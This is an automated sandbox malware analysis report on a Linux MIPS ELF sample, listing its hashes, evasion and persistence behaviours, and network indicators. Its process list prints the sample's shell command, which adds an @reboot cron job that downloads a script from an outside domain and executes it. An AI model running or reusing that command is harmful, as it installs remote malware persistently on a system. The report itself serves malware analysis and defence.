Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-da5mza1khs
Target b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
SHA256 b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840

Threat Level: Shows suspicious behavior

The file b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:49

Reported

2024-10-27 02:51

Platform

debian9-mipsel-20240611-en

Max time kernel

142s

Max time network

139s

Command Line

[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 168.235.111.72 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.DDLmqg /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/mounts /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf N/A

Processes

/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

[/tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
US 168.235.111.72:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:24240 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.DDLmqg

MD5 8c9ff02103c706a091467f66f463d116
SHA1 8389f2e1cb1e2bb7034773f88119c45482870a46
SHA256 e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4
SHA512 da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555